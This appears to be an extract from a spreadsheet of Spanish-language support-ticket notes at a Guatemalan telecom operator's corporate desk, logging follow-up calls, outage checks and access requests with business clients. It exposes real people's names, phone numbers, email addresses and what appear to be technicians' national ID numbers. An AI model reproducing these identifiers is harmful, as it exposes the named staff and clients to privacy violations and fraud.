    <t>SE LLAMA A CLIENTE DONOVAN ZULETA 22680600 MENCIONA QUE EL SERVICIO ESTA EN UN CARRITO Y CUANDO CIERRAN LAS PUERTAS SE PIERDE LA SEÑAL, ADICIONAL CLIENTE ESTA SOLICITANDO CAMBIO DE EQUIPO POR SER MUY ANTIGUO, SE LE BRINDA CONTACTO DE EJECUTIVO Y SE LE INDICA QUE A NIVEL DE CLARO EL SERVICIO ESTA OPERATIVO Y ESTABLE
-ID 2001578301</t>
  </si>
  <si>
    <t>F4579419</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE DANILO PUERTO QUIEN INDICA QUE NO ESTA EN EL PUNTO REMOTO YA QUE ESTA EN OTRA CIUDAD.
PERO INDICA QUE ESTA VIENDO DE SOLICITAR VISITA TECNICA.
2001642123
COLA:
NOMBRE: A: 0050494679411
NÚMERO: 0050494679411
DURACIÓN: 0:00:50
ESTADO: CONECTADA
DETALLES: 0050494679411
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/05/2022 14:46:11</t>
  </si>
  <si>
    <t>DANILO  PUERTO-25574350 EXT. 63524 ---- SE HA LLAMADO A CLIENTE ##ENVIA DIRECTO A BUZON ##
2001577127
COLA:
NOMBRE: A: 0050425574350
NÚMERO: 0050425574350
DURACIÓN: 0:00:08
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050425574350
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 11:29:01
2001577163
COLA:
NOMBRE: A: 0050425574350
NÚMERO: 0050425574350
DURACIÓN: 0:00:08
ESTADO: MARCANDO
DETALLES: 0050425574350
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 11:29:09</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE DANILO PUERTO 94679411 COMENTA QUE POR LA HORA ES DIFICIL TRABAJAR  DE NOCHE, DEBIDO AL PERSONAL ## PIDE SE LE DEVUELVA LLAMADA DENTRO DE 15 MINUTOS ## VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AC LEITNE DANILO PUERTO 94679411 COMENTA QUE SE DE SEGUIMIENTO MAÑANA 10 AM ## SE PROCEDE A ENVIARLE CORREO ##VIVO</t>
  </si>
  <si>
    <t>NILROD MORALES 31732082. COMETNA QUE PARA PEDIR PERMISOS ##  SE REALICE CON DANILO PUERTO 94679411 ## VIVO</t>
  </si>
  <si>
    <t>F4579424</t>
  </si>
  <si>
    <t>**SE LLAMÓ A CLIENTE JOSE FUENTES  AL 23386801 EXT 32320 NO RESPONDE, SE INTENTARA LUEGO YA QUE AUN NO RESPONDE CORREO **
ID 2001659284
**</t>
  </si>
  <si>
    <t>**SE LLAMÓ A CLIENTE JOSE FUENTES  AL 23386801 EXT 32320 NO RESPONDE, SE INTENTARA LUEGO YA QUE AUN NO RESPONDE CORREO **
ID 2001593284
**</t>
  </si>
  <si>
    <t>**SE LLAMÓ A CLIENTE JOSE FUENTES  AL 23386801 EXT 32320 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001565467
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 23386801 EXT 32320 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE FUENTES 23386801 RESPONDE UN SR(NO BRINDA NOMBRE) PERO MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001679717</t>
  </si>
  <si>
    <t>**SE LLAMÓ A CLIENTE JOSE FUENTES  AL 23386801 EXT 32320 NO RESPONDE, SE INTENTARA LUEGO YA QUE AUN NO RESPONDE CORREO **
ID 2001620213
**</t>
  </si>
  <si>
    <t>F4579450</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL BRITANY URETA 53514917 NO RESPONDE, SE INTENTARA LUEGO**
ID 2001566507
**</t>
  </si>
  <si>
    <t>F4579482</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DORCAR GUARCHAJ 48654090 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001591399</t>
  </si>
  <si>
    <t>CLIENTE DORCAR GUARCHAJ 48654090 VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES, SOLICITA SE DEJE EN OBSERVACIÓN Y VALIDAR A LAS 12 HORAS.
ID: 2001547556</t>
  </si>
  <si>
    <t>F4579506</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 27 DE MAYO DE 2022 12:10
PARA: WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SONKAR, KARISHMA - CONTRACTOR {PEP} &lt;KARISHMA.SONKAR.CONTRACTOR@PEPSICO.COM&gt;; DL - IT INTL - NETWORK CASA &lt;DL-ITINTL-NETWORKCASA@PEPSICO.COM&gt;; PEPSICO-HCL-CIM &lt;PEPSICO-HCL-CIM@HCL.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
CC: AGUILAR, VICTOR - CONTRACTOR {PEP} &lt;VICTOR.AGUILAR.CONTRACTOR@PEPSICO.COM&gt;; PEPSICO NETWORK OPERATIONS CENTER &lt;PEPSICO.NOC@HCL.COM&gt;; DL - IT HCL NETWORK TEAM &lt;ITHCLNETWORKTEAM@PEPSICO.COM&gt;; DL - GLOBAL IT NET OPS SERVICE &lt;DL-GLOBALIT-NETOPSSERVICE@PEPSICO.COM&gt;; DL - IT PEPSICO NETWORK OPERATIONS &lt;ITGNSQMANAGEMENT@PEPSICO.COM&gt;; DL - IT HCL WIRELESS TEAM &lt;DL-ITHCLWIRELESSTEAM@PEPSICO.COM&gt;; DL - IT POC &lt;ITIOCC@PEPSICO.COM&gt;
ASUNTO: RE: LATAM||GUAT-031|| CTRA AL HOSPITAL NACIONAL KM 264, HUEHUETENANGO || SITE ISOLATED || INC05367554
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>NO SE HA TENIDO RESPUESTA DE CLIENTE VÍA CORREO, SE LE PIDE DE NUEVO APOYO POR LA MISMA VÍA, EN ESPERA:
ASUNTO: RE: LATAM||GUAT-031|| CTRA AL HOSPITAL NACIONAL KM 264, HUEHUETENANGO || SITE ISOLATED || INC05367554</t>
  </si>
  <si>
    <t>F4579531</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERTO BONILLA AL 22509533 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
ID 2001577077
**</t>
  </si>
  <si>
    <t>F4579532</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE DOUGLAS, SE LE INDICA QUE EL INCONVENIENTE SE OBSERVA A NIVEL LAN YA QUE ARP NO SE COMPLETAN, SOLICITA SE EL ENVIE ESTA INFORMACION VIA CORREO.
NÚMERO: 7753
FIN: HOY, 13:18
ID DE LLAMADA: 2001613203</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EVELIN VILLAFUENTE 40049654 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001580273
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDRES AL 47704970 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001579876
**</t>
  </si>
  <si>
    <t>F4579553</t>
  </si>
  <si>
    <t>SE PROCEDE A VALIDAR PATRICIA DE GARCIA 71294226
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>NOS TRANSFIEREN LA LLAMADA CON PATRICIA DE GARCIA  QUIEN INDICA QUE EL PROBLEMA QUE ESTA PRESENTANDO ES CON LLAMADAS SALIENTES YA QUE NO DEJA COMPLETAR, INDICA QUE LES DA TONO Y CUANDO TERMINAN DE MARCAR YA NO LLAMA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE REALIZA PRUEBAS PERO AUN NO DEJA SACAR LLAMADAS, SE LE INDICA QUE REINICIE LA PBX PERO CLIENTE DESCONOCE DONDE ESTA LA MISMA, SE LE INDICA QUE SE ENVIARA PERSONAL TECNICO A CERTIFICAR EL SERVICIO, CLIENTE INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS PARA EL INRGESO Y QUE SE RETIRA A LAS 16:00 HRS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE PATRICIA DE GARCIA 71294226 PARA REALIZAR PRUEBAS DE LLAMADAS SALIENTES
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NO NOS CONTESA PARA VALIDAR EL SERVICO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4579571</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE INGRID HERNANDEZ 41951836 PERO ENVÍA A BUZÓN, SE INTENTARA EN UNOS INSTANTES
2001569216
COLA:
NOMBRE: A: 41951836
NÚMERO: 41951836
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DURACIÓN: 0:00:22
DETALLES: 41951836
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 27/05/2022 11:09:57
2001569569
COLA:
NOMBRE: A: 41951836
NÚMERO: 41951836
ESTADO: CONECTADA
DURACIÓN: 0:00:15
DETALLES: 41951836
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 27/05/2022 11:10:10</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE INGRID HERNANDEZ 41951836 ID: 2001577215 / ENVIA A BUZON, SE LLAMA CL CENTRAL LUZ MARIA DE RAMIREZ 24183400  ID: 2001577446, PONE EN CONFERENCIA A INGRID, SE DEJA EN CONFERENCIA CON JANGEL.GODINEZ PARA EL SEGUIMIENTO O PRUEBAS | WIP</t>
  </si>
  <si>
    <t>F4579578</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JESICA MARTINEZ 76818613 - 22956307 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001558764 - 2001559043</t>
  </si>
  <si>
    <t>F4579581</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 57516958/77561190 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.
ES NECESARIO DETERMINAR ESTADO DE LOS EQUIPOS Y/O REALIZAR PRUEBAS.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEX HERRERA AL 57516958 INDICA QUE REINICIARA EQUIPOS Y QUE DEVOLVERA LLAMADAEN 10 MINUTOS || SE NOTIFICA A GESTOR **
ID 2001586274
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX HERRERA 57516958 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE TRATA DE DEJAR EN CONFERENCIA CON GESTOR PERO CLIENTE CON GESTOR PERO CLIENTE CORTA LA LLAMADA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001603477 - 2001603839</t>
  </si>
  <si>
    <t>F4579594</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE BOLAÑOS 59852965 MENCIONA QUE ESTARA ESCALANDO EL CASO CON SU IT PARA VERIFICAR LOS EQUIPOS INTERNOS
-ID 2001595927</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 59852965/77561170 PARA SEGUIMIENTO, NO CONTESTA;  CENTRAL 58861282 TAMPOCO LO HACE, SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4579609</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRANDON GALDAMEZ AL 46911894 77561180 NO RESPONDE, SE INTENTARA LUEGO**
ID 2001618992 - 2001619340
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRANDON GALDAMEZ AL 46911894 77561180 NO RESPONDE, SE INTENTARA LUEGO**
ID 2001578265 - 2001578806
**</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON ELDER RECINOS/TÉCNICO 58263510 INDICA QUE FUE A PR REINICIÓ EQUIPOS Y LOS DESCONECTÓ DE LE ENERGÍA ELÉCTRICA; PIDE SE LE AVISE A GESTIÓN N1 QUE SE LE LLAME PARA VER COMPORTAMIENTO DEL SERVICIO.
SE INFORMA DE LO ANTERIOR A GESTIÓN N1 VÍA SKYPE.</t>
  </si>
  <si>
    <t>CLIENTE EXPONE QUE TIENE PING EXTENDIDO HACIA PR PERO NO SE TIENE CONEXION--- VEN EL SERVICIO CAIDO-</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRANDON GALDAMEZ AL 46911894 77561180 NO RESPONDE, SE INTENTARA LUEGO**
ID 2001589674 - 2001591171
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JANETH GARCIAAL 54300012 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001619504
**</t>
  </si>
  <si>
    <t>F4579738</t>
  </si>
  <si>
    <t>DANI LOPEZ-47536113    SE LLAMAA Y NO CONTESTA ##
2001570438
COLA:
NOMBRE: A: 47536113
NÚMERO: 47536113
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 47536113
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 11:14:03</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANI LOPEZ-47536113    ---  INDICA QUE YA TODO OK Y QUE SE PROCEDA CON CIERRE ## POSIBLE PROBLEMA DE ENERGIA
2001570960
COLA:
NOMBRE: A: 56928191
NÚMERO: 56928191
DURACIÓN: 0:01:57
ESTADO: CONECTADA
DETALLES: 56928191
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 27/05/2022 11:15:34</t>
  </si>
  <si>
    <t>F4579745</t>
  </si>
  <si>
    <t>F4580045</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA MORALES 44524076 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 20015888421</t>
  </si>
  <si>
    <t>F4580047</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO GAMEZ AL +524448037642 CONFIRMA SERVICIO ESTABLE SOLO SOLICITA QUE PARA PODERSE CERRAR EL TICKET QUE SE LE ENVIE POR CORREO LA CAUSA Y LA RAIZ DEL PROBLEMA || SE NOTIFICA A GESTOR **
ID 2O01570502
**</t>
  </si>
  <si>
    <t>F4580055</t>
  </si>
  <si>
    <t>PENDIENTE RESPUESTA CLIENTE</t>
  </si>
  <si>
    <t>** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE CONFIRMACION DE ACCESOS EL DÍA DE HOY SÁBADO O BIEN HASTA EL DÍA LUNES **
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 4 DE JUNIO DE 2022 12:42
PARA: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; SAUL GEUSSEPE SILIEZAR LOPEZ &lt;SAUL.SILIEZAR@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; AGE1019@MAILPRIVADO.BDR &lt;AGE1019@MAILPRIVADO.BDR&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: F4580055 || 8902408T || BANRURAL || REDUNDANCIA WIMAX.- 1 CALLE 2-66 BARRIO SAN FRANCISCO ZONA 2 JALAPA, JALAPA
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA, FAVOR DE SU APOYO EN CONFIRMAR LA GESTIÓN DE ACCESOS PARA EL PERSONAL QUE SE DESCRIBE A CONTINUACIÓN. DE MOMENTO SI SERÍA EL DÍA DE HOY LOS ACCESOS SE SOLICITAN PARA MARCOS CIFUENTES. SI FUERA EL DÍA LUNES LA VISITA SE SOLICITA SE PARA FABIO CIFUENTES Y RUDI CIFUENTES.
FABIO GUILLERMO CIFUENTES DE LEÓN     1635832930920
RUDI LIZANDRO MADRID MENDEZ              2082124341219
MARCOS JOSUE CIFUENTES CABRERA         1988352640920
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ  AL 57081768 NO RESPONDE, SE INTENTARA LUEGO PARA CONFIRMAR ACCESOS **
ID 1001467836
**</t>
  </si>
  <si>
    <t>SE REENVIA  CORREO A CLIENTE
PENDIENTE RESPUESTA CLIENTE
BUENA TARDE ESTIMADO CLIENTE
NUEVAMENTE SOLICITANDO DE SU AMABLE APOYO  CON LOS ACCESOS SOLICITADOS  PARA PODER TRABAJAR SERVICIO
535716 FABIO GUILLERMO CIFUENTES DE LEÓN 1635832930920 58261473
650481 RUDI LIZANDRO MADRID MENDEZ 2082124341219 58260629</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL  PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 1001471896</t>
  </si>
  <si>
    <t>SE REENVIA NUEVAMENTE CORREO , SE LLA A ANIBAL GONZALES NO SE LOGRA CONTACTAR
RE: F4580055 || 8902408T || BANRURAL || REDUNDANCIA WIMAX.- 1 CALLE 2-66 BARRIO SAN FRANCISCO ZONA 2 JALAPA, JALAPA
JONATHAN EDUARDO TEZEN MEJIA
BUENAS TARDES APRECIABLE CLIENTE
SOLICITAMOS DE SU APOYO COORDINANDO ACCESOS PARA EL DÍA LUNES, FAVOR SU APOYO CONFIRMANDO HORARIO DE ATENCIÓN PARA DESPLAZAR A NUESTRO PERSONAL.
O CONFIRMARNOS VISITA A LAS 9:00HRS EL DIA DE MAÑANA SABADO 04/06/2022
ID: 8902408T
REDUNDANCIA.- BARRIO EL PROGRESO ZONA 1 LA REFORMA
535716 FABIO GUILLERMO CIFUENTES DE LEÓN 1635832930920 58261473
650481 RUDI LIZANDRO MADRID MENDEZ 2082124341219 58260629</t>
  </si>
  <si>
    <t>*** SE RECIBE CORREO AUTORIZANDO ACCESOS, SE PROCEDE A APERTURAR WO ***
DE: TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 8:24
PARA: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; SAUL GEUSSEPE SILIEZAR LOPEZ &lt;SAUL.SILIEZAR@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; MONITOREO.ENLACES@BANRURAL.COM.GT &lt;MONITOREO.ENLACES@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; AGE1019@MAILPRIVADO.BDR &lt;AGE1019@MAILPRIVADO.BDR&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: F4580055 || 8902408T || BANRURAL || REDUNDANCIA WIMAX.- 1 CALLE 2-66 BARRIO SAN FRANCISCO ZONA 2 JALAPA, JALAPA
BUEN DÍA ESTIMADOS
SE BRINDA ACCESO EL DÍA DE HOY EN HORARIO DE 8:30 A 17:00 HRS.
POR FAVOR @AGE1019@MAILPRIVADO.BDR BRINDAR ACCESO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ  AL 57081768 INDICA QUE AHORITA RESPONDERA CORREO CON AUTORIZACION DE ACCESOS **
ID 1001473793
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ BANRURAL - 57081768 23081000 EXT 301690 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001043420 - 3001043564
**</t>
  </si>
  <si>
    <t>NO SE CUENTA CON ACCESOS</t>
  </si>
  <si>
    <t>SE  REENVIA  CORREO A CLIENTE  EN ESPERA DE ACCESOS
RE: F4580055 || 8902408T || BANRURAL || REDUNDANCIA WIMAX.- 1 CALLE 2-66 BARRIO SAN FRANCISCO ZONA 2 JALAPA, JALAPA
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:CARLOS EDGARDO ICHEL ESCOBAR;JUAN CARLOS LOPEZ SANCHEZY 3 MÁS
CC:CNOCCA;CLIENTESCORPORATIVOS;GRUPO N1
LUN 30/05/2022 11:33
BUENA TARDE ESTIMADO CLIENTE
NUEVAMENTE SOLICITANDO DE SU AMABLE APOYO  CON LOS ACCESOS SOLICITADOS  PARA PODER TRABAJAR SERVICIO
535716 FABIO GUILLERMO CIFUENTES DE LEÓN 1635832930920 58261473
650481 RUDI LIZANDRO MADRID MENDEZ 2082124341219 58260629</t>
  </si>
  <si>
    <t>F4580077</t>
  </si>
  <si>
    <t>SE LLAMA AL NUMERO 525551745299, ATIENDE LAURA RODRÍGUEZ CONFIRMA QUE EL SERVICIO ESTA ACTIVO, SE PROCEDE AL CIERRE DEL TICKET
2001616971
COLA:
NOMBRE: A: 00525551745299
NÚMERO: 00525551745299
ESTADO: CONECTADA
DURACIÓN: 0:03:48
DETALLES: 00525551745299
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 27/05/2022 13:25:21</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 27 DE MAYO DE 2022 13:02
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ ESCALONA JUAN JOSE &lt;JHESCALO@UNINET.COM.MX&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 4690063 ### ::: TICKET CNOC IMBBL004037 ### ::: LINK DOWN
BUENA TARDE
      ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, A NIVEL DE CLARO NO SE REALIZÓ NINGUNA ACCIÓN CORRECTIVA.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4580137</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
SÁB 28/05/2022 1:34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844¿¿¿¿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0137¿¿
ID: 47501268T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1844
UBICADO EN:
OFICINAS TELGUA ZONA 6 21 AVENIDA 9-45 ZONA 6 BARRIO SAN ANTONIO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4580159</t>
  </si>
  <si>
    <t>|| CLIENTE CONFIRMA VISITA EN CONJUNTO PARA EL DIA DE MAÑANA LUNES 30/05 A LAS 9 AM ||
MYNOR HERNÁNDEZ &lt;MYNOR.HERNANDEZ@TAV.COM.GT&gt;
ASUNTO: SOLICITUD DE ACCESOS. F4580159 || 47503530T || "CC_TYT_GT_ATM4505" ||
BUEN DÍA,
ESTIMADO WERNER; YA ESTÁ CONFIRMADO DESDE EL DÍA DE AYER, PARA MAÑANA LUNES 30/05/2,022 A LAS 09:00 HORAS.</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CARLOS SOZA/CLIENTE INDICA QUE ENLACE RESTABLECIÓ POR 20 MINUTOS PERO EN ESTE MOMENTO ENLACE DOWN; SE INFORMA DE LO ANTERIOR A CNOC CLARO VÍA SKYPE. SE LE INDICA A CLIENTE QUE SE VERIFICARÁ DE NUEVO SERVICIO.</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A CNOC CLARO VÍA SKYPE; FALLA F4615198 (PRINCIPAL) AFECTADO POR CORTE DE FO, YA REPARADA. JUAN CARDONA/TEAM LEADER NO CONTESTA; SE ESCALÓ CON KEVYN FONSECA/TEAM LEADER INDICA QUE NOS APOYARÁ.</t>
  </si>
  <si>
    <t>EN EL SIGUIENTE CORREO DE CLIENTE, ÉSTE CONFIRMA QUE ENLACE PRINCIPAL/BACK UP YA LOS VE OPERATIVOS, PROCEDER AL CIERRE DE ESTE TICKET TAMBIÉN:
DE: CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;
ENVIADO EL: LUNES, 27 DE JUNIO DE 2022 08:59
ASUNTO: RE: VERIFICACION FALLAS DE ENLACES CLARO ATM 4505 / CAIDA TOTAL Y REVISION DE EQUIPOS
BUENOS DIAS
DEL LADO DE TYT YA SE VEN ARRIBA LOS DOS ENLACES, GRACIAS</t>
  </si>
  <si>
    <t>NO SE CUENTA CN COORDENADAS SOLO DIRECCION DE UBICACION
PLACA I, CALLE PRINCIPAL ENTRE RIOS, PUERTO BARRIOS IZABAL_SUPER 24 ENTRE RIOS</t>
  </si>
  <si>
    <t>A ESPERA DE QUE SUPERVISOR ENVIE EL FORMULARIO FIRMADO
DE: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 11:08
PARA: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; CESAR ALFREDO MORALES HERNANDEZ &lt;CESAR.MORALES@CLARO.COM.GT&gt;; MANUEL EDUARDO PINEDA PAIZ &lt;MANUEL.PINEDA@CLARO.COM.GT&gt;; EDUARDO ALEJANDRO URIZAR ESTRADA &lt;EDUARDO.URIZAR@CLARO.COM.GT&gt;; INGENIERIA.CORPORATIVA@CLARO.COM.GT &lt;INGENIERIA.CORPORATIVA@CLARO.COM.GT&gt;; GUSTAVO ADOLFO SIERRA LANG &lt;GUSTAVO.SIERRA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; DARLING ELISABET ALVAREZ IBOY &lt;DARLING.ALVAREZ@CLARO.COM.GT&gt;
ASUNTO: RE: F4580159 || 47503530T || TYT IZABAL
BUEN DÍA ING. MANUEL.
SEGÚN LO CONVERSADO LO AGREGAMOS A LA COLA DE CORREOS PARA EL SEGUIMIENTO DEL ENLACE MENCIONADO, ADJUNTAMOS FORMATO PARA SOLICITAR LA MIGRACIÓN SU APOYO EN ENVIARNOS EL DOCUMENTO PARA PODER CONTINUAR CON EL PROCESO Y SOLICITAR LA MIGRACIÓN DEL SERVICIO, CUALQUIER CONSULTA ADICIONAL ESTAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
